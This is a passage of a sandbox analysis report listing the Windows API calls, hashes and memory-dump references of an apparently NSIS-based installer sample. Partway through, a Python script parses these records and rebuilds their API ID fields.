                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: verifying installer: %d%%
                                              • API String ID: 1451636040-82062127
                                              • Opcode ID: a052d906e27c43246bcc9f1aeeeeed0a4803bb8fb5ea3e7766d01d4d8a37771c
                                              • Instruction ID: aa47155a64d8ebbb4a0163e37034f34a23c06eccf97bc0b219fefb1598c68ac6
                                              • Opcode Fuzzy Hash: a052d906e27c43246bcc9f1aeeeeed0a4803bb8fb5ea3e7766d01d4d8a37771c
                                              • Instruction Fuzzy Hash: 25014470640108BBDF109F64DD49FAE3BA9AB04304F004139FA06A51E0DBB989558F58
                                              APIs
                                              • CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
                                              • CharNextW.USER32(?,?,?,00000000), ref: 00405B59
                                              • CharNextW.USER32(?,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
                                              • CharPrevW.USER32(?,?,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: *?|<>/":
                                              • API String ID: 589700163-165019052
                                              • Opcode ID: b7b5818da4b4a2654bbca5167226ce5d18b2b6f4b0368041995d2741e331b462
                                              • Instruction ID: 31febb90154ecf465c6c3fd58460301c566faf6ecd06643fefb4dc305e878468
                                              • Opcode Fuzzy Hash: b7b5818da4b4a2654bbca5167226ce5d18b2b6f4b0368041995d2741e331b462
                                              • Instruction Fuzzy Hash: B9118E15810A1599CB30BB298840E7BB7F8EE95750750853FED85B32C1E778BC81CABD
                                              APIs
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014B9
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014F5
                                              • RegCloseKey.ADVAPI32(?), ref: 004014FE
                                              • RegCloseKey.ADVAPI32(?), ref: 00401523
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401541
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Close$DeleteEnumOpen
                                              • String ID:
                                              • API String ID: 1912718029-0
                                              • Opcode ID: 9a7fa1e295040e987171b31cb3058b13b4927fc82cebbafdfd6fdbcfdef2d769
                                              • Instruction ID: 18dccf383a29a435c3c5d53fdb083507bb3959694e3d248e427a957da49423c4
                                              • Opcode Fuzzy Hash: 9a7fa1e295040e987171b31cb3058b13b4927fc82cebbafdfd6fdbcfdef2d769
                                              • Instruction Fuzzy Hash: B8113776500108FBDF119FA0DE85AAE3B7DEB45348F00443AF90AB51B0D7359E94AE69
                                              APIs
                                              • GetFileVersionInfoSizeW.VERSION(00000000,?), ref: 004020BF
                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?), ref: 004020E0
                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 004020F8
                                              • VerQueryValueW.VERSION(?,004082C8,?,?,?,00000000,00000000,00000000), ref: 00402111
                                                • Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C
                                              • GlobalFree.KERNEL32(0078BA50), ref: 00402139
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                              • String ID:
                                              • API String ID: 3376005127-0
                                              • Opcode ID: 1fcda80dc11e1363c08de8126c867463e0ce0b74cafb0b4a8e36d66cc7975c69
                                              • Instruction ID: ca10dc8ef845363045b229a4896d1fbdc02f34fd782a724fb491659cb49530f2
                                              • Opcode Fuzzy Hash: 1fcda80dc11e1363c08de8126c867463e0ce0b74cafb0b4a8e36d66cc7975c69
                                              • Instruction Fuzzy Hash: 11116A72900204ABDB11ABA5DE08A9E77B9AF04354F108136F605FA1E0EB78D940CB58
                                              APIs
                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,00000000,00000002,?), ref: 00401DDF
                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401DF7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              • Opcode ID: 0a2216d3efa57a78be66af89e8cb1db1661eab1c73c2f6238fd6ec7ea61d154f
                                              • Instruction ID: 2bd8fc9b8c4150d32bad90dfffc0448b15bb1a7470975d4e46508bb72c72871e
                                              • Opcode Fuzzy Hash: 0a2216d3efa57a78be66af89e8cb1db1661eab1c73c2f6238fd6ec7ea61d154f
                                              • Instruction Fuzzy Hash: 77216071940218AADB15AFB4C946BFD7BB5EF05309F10857EFA02B50E1D77C8A809758
                                              APIs
                                              • lstrlenW.KERNEL32(0044FD98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,0044FD98,?), ref: 00403FB0
                                              • wsprintfW.USER32 ref: 00403FBD
                                              • SetDlgItemTextW.USER32(?,0044FD98,000000DF), ref: 00403FD0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s
                                              • API String ID: 3540041739-3551169577
                                              • Opcode ID: 7463db91dfc42c9920fcb0c5be4cc11050eaef945611b5cb4dc0a4985e01960d
                                              • Instruction ID: 5fad3c86b264af19ee74e6bf29dedfa0a61a2e47495169cbabc6e73bcd4b5a17
                                              • Opcode Fuzzy Hash: 7463db91dfc42c9920fcb0c5be4cc11050eaef945611b5cb4dc0a4985e01960d
                                              • Instruction Fuzzy Hash: 12117D32B002087BCB10DB699D41E9E766EEBD5338F10423BF519F31E0EA388A15875C
                                              APIs
                                              • RegCreateKeyExW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00402546
                                              • lstrlenW.KERNEL32(004120F8), ref: 00402567
                                              • RegSetValueExW.ADVAPI32(?,?,00000000,?,004120F8,00000000), ref: 004025A6
                                              • RegCloseKey.ADVAPI32(?), ref: 004025B6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CloseCreateValuelstrlen
                                              • String ID:
                                              • API String ID: 1356686001-0
                                              • Opcode ID: eb21bdfbd278206649cafd0a134e8c3462c0890b110457211e04b26388198419
                                              • Instruction ID: e0ce6b6c9d891c2747ed896ffb728d3f7ff2228f80022de3c727e62f6400905b
                                              • Opcode Fuzzy Hash: eb21bdfbd278206649cafd0a134e8c3462c0890b110457211e04b26388198419
                                              • Instruction Fuzzy Hash: 6F21B071A00204BBEB10AF65DE89FAF7779EB44714F10813BF504B61E1D7B89A809B6C
                                              APIs
                                                • Part of subcall function 00404A73: lstrlenW.KERNEL32(00447D88,00424D76,74DF23A0,00000000), ref: 00404AAB
                                                • Part of subcall function 00404A73: lstrlenW.KERNEL32(0040304D,00447D88,00424D76,74DF23A0,00000000), ref: 00404ABB
                                                • Part of subcall function 00404A73: lstrcatW.KERNEL32(00447D88,0040304D), ref: 00404ACE
                                                • Part of subcall function 00404A73: SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
                                                • Part of subcall function 00404A73: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
                                                • Part of subcall function 00404A73: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
                                                • Part of subcall function 00404A73: SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E
                                                • Part of subcall function 004056EC: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0045FDD0,Error launching installer), ref: 00405711
                                                • Part of subcall function 004056EC: CloseHandle.KERNEL32(?), ref: 0040571E
                                              • WaitForSingleObject.KERNEL32(00000000,00000064,?,?,?,?,?,00000000,000000EB,00000000), ref: 0040202F
                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,?,?,?,00000000,000000EB,00000000), ref: 00402044
                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00402051
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,000000EB,00000000), ref: 004026BD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                              • String ID:
                                              • API String ID: 3585118688-0
                                              • Opcode ID: ad270f84a8785551dbcb8ed3b2656b967ed5d4589d67cc04499c355dac912d43
                                              • Instruction ID: 202ebcddbf8b426187c6ee2470dbf35ac1bf8be3455b7115f7585c4331235d23
                                              • Opcode Fuzzy Hash: ad270f84a8785551dbcb8ed3b2656b967ed5d4589d67cc04499c355dac912d43
                                              • Instruction Fuzzy Hash: 3E118231900214EADB219FA1CE08B9E7A75EB04358F104037E615B60E1C7BD8A82DB5D
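The two records above (the RegCreateKeyExW/RegSetValueExW/RegCloseKey record and the CreateProcessW/WaitForSingleObject/GetExitCodeProcess record with its "Part of subcall function" entries) are in the same line format as every other record in this listing, so they can be parsed mechanically. The following is an added example, not code from this report or from Joe Sandbox. It parses the "APIs" lines of a record into call objects and rebuilds the record's "API ID" field by a rule inferred from the records on this page: split each API name into words, drop words of three characters or fewer (Get, Set, Reg, Key, Ex, W, For), count words across all listed calls including subcalls, group by frequency with the most frequent group first, sort each group in ASCII order and join the groups with "$". That rule, the line regex and the small behaviour-tag table are the example's own assumptions. The "API String ID" hashes are not reproduced because the page does not show how they are computed.

```python
"""Parse the per-function "APIs" records of a Joe Sandbox execution-graph
listing and reconstruct the "API ID" field from the listed calls.

Added example, not Joe Sandbox code. The API ID rule is inferred from the
records on this page and is an assumption, not a documented algorithm.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# One "• Api.MODULE(args), ref: ADDR" line, optionally prefixed with the
# "Part of subcall function XXXXXXXX:" marker; the argument list is optional
# (e.g. "wsprintfW.USER32 ref: 00403FBD").
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str                 # e.g. "RegSetValueExW"
    module: str              # e.g. "ADVAPI32"
    args: tuple              # argument column exactly as written in the report
    ref: str                 # address of the call site
    subcall: Optional[str]   # callee address when listed as "Part of subcall"


def parse_api_lines(text: str) -> list:
    """Return the calls of one record in listing order, subcalls included."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # "APIs" header, "Strings", memory-dump lines, ...
        args = tuple(a for a in (m["args"] or "").split(",") if a)
        calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return calls


def name_words(api: str) -> list:
    """Split an API name into words and keep only words longer than 3 chars:
    'RegCreateKeyExW' -> ['Create'], 'lstrlenW' -> ['lstrlen']."""
    return [w for w in re.findall(r"[A-Z]?[a-z]+|[A-Z]", api) if len(w) > 3]


def api_id(api_names) -> str:
    """Rebuild the report's 'API ID' (assumed rule): count words over all
    calls, one tier per frequency, most frequent tier first, ASCII order
    inside a tier (uppercase sorts before lowercase), tiers joined by '$'."""
    counts = Counter(w for name in api_names for w in name_words(name))
    tiers = {}
    for word, n in counts.items():
        tiers.setdefault(n, []).append(word)
    return "$".join("".join(sorted(tiers[n])) for n in sorted(tiers, reverse=True))


def record_api_id(text: str) -> str:
    return api_id(c.api for c in parse_api_lines(text))


# This script's own triage table (not a report field): coarse behaviour tags
# a triager looks for when walking an installer stub's call list.
BEHAVIOUR_TAGS = {
    "RegSetValueExW": "registry-write",
    "CreateProcessW": "process-create",
    "GetProcAddress": "dynamic-api-resolve",
    "WriteFile": "file-write",
}


def behaviour_tags(calls) -> set:
    return {BEHAVIOUR_TAGS[c.api] for c in calls if c.api in BEHAVIOUR_TAGS}


# Two records copied verbatim from this report.
REGISTRY_RECORD = """APIs
• RegCreateKeyExW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00402546
• lstrlenW.KERNEL32(004120F8), ref: 00402567
• RegSetValueExW.ADVAPI32(?,?,00000000,?,004120F8,00000000), ref: 004025A6
• RegCloseKey.ADVAPI32(?), ref: 004025B6
"""

LAUNCH_RECORD = """APIs
  • Part of subcall function 00404A73: lstrlenW.KERNEL32(00447D88,00424D76,74DF23A0,00000000), ref: 00404AAB
  • Part of subcall function 00404A73: lstrlenW.KERNEL32(0040304D,00447D88,00424D76,74DF23A0,00000000), ref: 00404ABB
  • Part of subcall function 00404A73: lstrcatW.KERNEL32(00447D88,0040304D), ref: 00404ACE
  • Part of subcall function 00404A73: SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
  • Part of subcall function 00404A73: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
  • Part of subcall function 00404A73: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
  • Part of subcall function 00404A73: SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E
  • Part of subcall function 004056EC: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0045FDD0,Error launching installer), ref: 00405711
  • Part of subcall function 004056EC: CloseHandle.KERNEL32(?), ref: 0040571E
• WaitForSingleObject.KERNEL32(00000000,00000064,?,?,?,?,?,00000000,000000EB,00000000), ref: 0040202F
• WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,?,?,?,00000000,000000EB,00000000), ref: 00402044
• GetExitCodeProcess.KERNEL32(?,?), ref: 00402051
• CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,000000EB,00000000), ref: 004026BD
"""

if __name__ == "__main__":
    for label, rec in (("registry", REGISTRY_RECORD), ("launch", LAUNCH_RECORD)):
        calls = parse_api_lines(rec)
        print(label, len(calls), "calls", record_api_id(rec), sorted(behaviour_tags(calls)))
```

Run against the two records it reproduces the API IDs printed on this page ("CloseCreateValuelstrlen" and "MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat"); the same rule also matches the other records in this section, which is the only evidence for it. Because subcall lines are folded in, a record's API ID describes the whole call tree under that function, so two functions with different bodies but the same helpers can share an ID; compare the "Instruction Fuzzy Hash" when that distinction matters.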
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,00002004), ref: 004026F7
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0040E0F0,000000FF,?,00002004,00000000,00000000), ref: 00402730
                                              • lstrlenA.KERNEL32(?), ref: 00402739
                                              • WriteFile.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00402756
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                              • String ID:
                                              • API String ID: 2568930968-0
                                              • Opcode ID: 4e4b35b0ddbdd6058c26d859be66250fdf62ee6eb5fca338a8859292909502b4
                                              • Instruction ID: ced7ad9a6504f6ed498d5adba380047bc9decdec085bb0b424ae9f8a02fb9dcb
                                              • Opcode Fuzzy Hash: 4e4b35b0ddbdd6058c26d859be66250fdf62ee6eb5fca338a8859292909502b4
                                              • Instruction Fuzzy Hash: F9014F70500205BEEB156F60CE4DBBF3A6CEF04744F10453AF641FA1E1DBB849419B69
                                              APIs
                                              • GetDC.USER32(?), ref: 00401EF7
                                              • GetDeviceCaps.GDI32(00000000), ref: 00401EFE
                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401F0E
                                                • Part of subcall function 004060CA: GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00424D76,74DF23A0,00000000), ref: 0040619B
                                              • CreateFontIndirectW.GDI32(0041E110), ref: 00401F61
                                                • Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                              • String ID:
                                              • API String ID: 1599320355-0
                                              • Opcode ID: a47370298229fbd9087b309e9c05a94d29a3d59c05c16ea411501fa641fe8ea9
                                              • Instruction ID: d6c42e3eeef43274fd936db1fda35bedcc132f3233f9f4bb317f1c521d1b95b8
                                              • Opcode Fuzzy Hash: a47370298229fbd9087b309e9c05a94d29a3d59c05c16ea411501fa641fe8ea9
                                              • Instruction Fuzzy Hash: BB018476644241AFE701ABB5AD4ABDE3BA4A715315F20883AE681B61E3CA784044CB2D
                                              APIs
                                              • DestroyWindow.USER32(00000000,00000000,00403297,00000001,?,?,?,00000000,004035D7,?), ref: 00402E4D
                                              • GetTickCount.KERNEL32 ref: 00402E6B
                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DB4,00000000), ref: 00402E88
                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,004035D7,?), ref: 00402E96
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                              • String ID:
                                              • API String ID: 2102729457-0
                                              • Opcode ID: c46447e93630878450969176786434de847f14ddf39dd8d972ff8c80f950fc89
                                              • Instruction ID: c637284af2d6cdf60ec22d353f69018081d624b8e4296ea034bdf55e3067f771
                                              • Opcode Fuzzy Hash: c46447e93630878450969176786434de847f14ddf39dd8d972ff8c80f950fc89
                                              • Instruction Fuzzy Hash: 89F05E30541A21EBC6616B20FE0CAAB7B64FB04B51B4008BFF945B11E4CB7448938BDD
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,00002004,00000000,00000000,00000000,0040219A,00000000,?), ref: 00405C34
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000), ref: 00405C4A
                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00405C59
                                              • GlobalFree.KERNEL32(00000000), ref: 00405C62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                              • String ID:
                                              • API String ID: 2883127279-0
                                              • Opcode ID: 7b8b1b869dc425c4e8d1decedcc15e3ea1801fb9e202fffad77dd5e1c54a2680
                                              • Instruction ID: e1c5d748dd31bcb7ed763deea17071bf78cda9c2e5a8ae371288e20c28570659
                                              • Opcode Fuzzy Hash: 7b8b1b869dc425c4e8d1decedcc15e3ea1801fb9e202fffad77dd5e1c54a2680
                                              • Instruction Fuzzy Hash: 00E092312001107BE2201B269E8CD6B7EACDFCA7B6B04013AF685E11A0CA308C11C678
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 00404403
                                              • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404471
                                                • Part of subcall function 00403937: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403949
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
